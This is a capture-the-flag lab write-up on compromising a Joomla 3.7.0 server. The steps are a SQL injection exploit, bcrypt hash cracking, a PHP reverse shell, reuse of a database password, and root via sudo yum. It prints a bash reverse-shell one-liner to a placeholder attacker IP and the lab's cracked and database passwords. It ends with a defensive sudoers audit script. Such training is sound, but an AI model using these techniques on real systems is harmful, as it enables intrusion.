
Lab Stats
Time: 6 hours
Hint taken: 0
Difficulty: Hard
Recon
I accessed the web server. This is a blog-like application showing an article about “Spider-man” robbing the bank.
Looking at the HTML, it shows that Joomla! is being used.
At first look, I tried to find the Joomla! version in the web pages, but they do not seem to contain that info.
I googled for more information and found out that we can see the Joomla! version by looking at the language XML file.
https://www.itoctopus.com/how-to-quickly-know-the-version-of-any-joomla-website

Web Enumeration
Navigate to robots.txt
I tried navigating to all the directories in robots.txt. The /administrator directory was promising because it shows an admin panel.
But I need to find the credentials for Super User first.
Network scanning

- ssh (22)
- http (80)
- mysql (3306)
It seems like the main attack vectors are the web server and database.
Gaining Foothold (1)
I tried a few SQL injection payloads in the user login feature, but they did not work.
So I googled for an exploit for Joomla! 3.7.0:
https://raw.githubusercontent.com/NinjaJc01/joomblah-3/master/joomblah.py
Note: this requires Python 2.

Found table:', 'fb9j5_users') Found user', ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']) (' - Extracting sessions from', 'fb9j5_session')
I will need to crack the password. First, I checked which hash algorithm the password uses with an online hash identifier (https://hashes.com/en/tools/hash_identifier).

I tried to use john to crack the password:
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt jonah.txt

So the password is spiderman123
I logged in as jonah in the admin panel.
Getting Reverse Shell from Joomla!
This took more time.
After googling, I discovered that we can replace the index.php file in a template with a PHP reverse shell.


Gaining Foothold (2)
I struggled to find the user flag manually, so I decided to run some Linux enumeration scripts.
I used a Python command to spawn a TTY:
python -c 'import pty; pty.spawn("/bin/sh")'
Mistakes
I went through my Linux PE checklist and none of the checks worked.
I saw we have an account:
jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash
In addition, I tried to check a few things:
- Trying all the SUID binaries to see if I can escalate privileges -> Doesn’t work
- Looking for Kernel Exploits -> Doesn’t work
Then, during the linpeas enumeration, I saw that a database password had been discovered.

- Test if mysql has any exploit and whether it is running as root -> Doesn’t work
- I tried to log in to MySQL as root:
  mysql -u root -p -D joomla
- But there is nothing useful there.
- I tried looking for Linux exploits and sudo exploits -> Doesn’t work
- No progress. I tried to log in as jjameson over SSH by brute-forcing, but it does not work.
How I realized my mistakes
At this point, I have not made any progress other than finding the database password.
MYSQL Password
user: root
pw: nv5uz9r3ZEDzVjNu
So I read through the checklists of other hackers.
This helped a lot: https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html

I realized my mistake. I should check if the discovered passwords are being reused for SSH and not rely on brute-forcing only.
SSH – Login Checks Methodology
- Check whether the known passwords are reused. Do this for every new password discovered during enumeration.
- If not, then try brute-forcing.
It took me 4 hours to figure out that the database password is reused as jjameson's SSH password.
Privilege Escalation
Now I can login as jjameson.
The first thing I did was run sudo -l.

I saw that this account can run sudo yum.
Yum PE
Good article: https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2
First, I need to install fpm and rpm:
git clone https://github.com/jordansissel/fpm
cd fpm
sudo gem install fpm
sudo apt-get install rpm
Then create a root.sh file with the payload:
#!/bin/bash
bash -i >& /dev/tcp/[ATTACKER IP]/3333 0>&1
Then create the package with root.sh:
fpm -n root -s dir -t rpm -a all --before-install root.sh .
Start a nc listener on port 3333.
Download the package to the target machine and install it:
sudo yum localinstall -y [package name].rpm

In the listener, we receive a connection as the root user.
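From the defender's side, the escalation above only works because a sudo rule lets a regular user run a package manager as root. As an added example (not part of this writeup, and not the lab's own tooling), here is a small Python audit that flags such sudoers rules and sudo log entries installing a local .rpm; the sudoers lines and log lines are constructed samples, and the user names in them are assumptions.

```python
import re
from os.path import basename
# Package managers whose install actions run package scriptlets (RPM %pre/%post,
# fpm's --before-install) as root, so a sudo rule granting one of them is a root shell.
RISKY_PKG_MANAGERS = {"yum", "dnf", "rpm", "zypper"}
# Simplified sudoers grammar: "user host = (runas) [NOPASSWD:] cmd1, cmd2" (no aliases).
SUDOERS_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?:(?:NOPASSWD|PASSWD|SETENV|NOSETENV):\s*)*(?P<cmds>.+)$"
)
# Standard sudo syslog line: "sudo: user : TTY=... ; PWD=... ; USER=root ; COMMAND=..."
SUDO_LOG_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:.*?USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$"
)
def risky_sudoers_rules(lines):
    """Return (user, command) pairs that let a user run a package manager as root."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = SUDOERS_RE.match(line)
        runas = m and (m.group("runas") or "root").split(":")[0].strip()
        if runas not in ("root", "ALL"):  # only rules that reach root matter here
            continue
        for cmd in m.group("cmds").split(","):
            prog = cmd.strip().split()[0]
            if prog == "ALL" or basename(prog) in RISKY_PKG_MANAGERS:
                findings.append((m.group("user"), cmd.strip()))
    return findings
def local_package_installs(log_lines):
    """Return (user, command) for sudo log entries installing a local .rpm as root."""
    hits = []
    for line in log_lines:
        m = SUDO_LOG_RE.search(line)
        if not m or m.group("runas") != "root":
            continue
        argv = m.group("cmd").split()
        if basename(argv[0]) in RISKY_PKG_MANAGERS and any(a.endswith(".rpm") for a in argv):
            hits.append((m.group("user"), m.group("cmd")))
    return hits
# Constructed sample inputs (not taken from the lab machine).
SAMPLE_SUDOERS = """
jjameson ALL=(ALL) NOPASSWD: /usr/bin/yum
alice    ALL=(ALL) /usr/bin/systemctl restart httpd
bob      ALL=(www-data) /usr/bin/rpm
""".splitlines()
SAMPLE_SUDO_LOG = """
Oct 12 10:00:01 bugle sudo: jjameson : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/yum localinstall -y root-1.0-1.noarch.rpm
Oct 12 10:01:15 bugle sudo:    alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/systemctl restart httpd
""".splitlines()
```

Run risky_sudoers_rules over a real /etc/sudoers (and /etc/sudoers.d/*) and local_package_installs over /var/log/secure or the journal to find the same condition before an attacker does.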
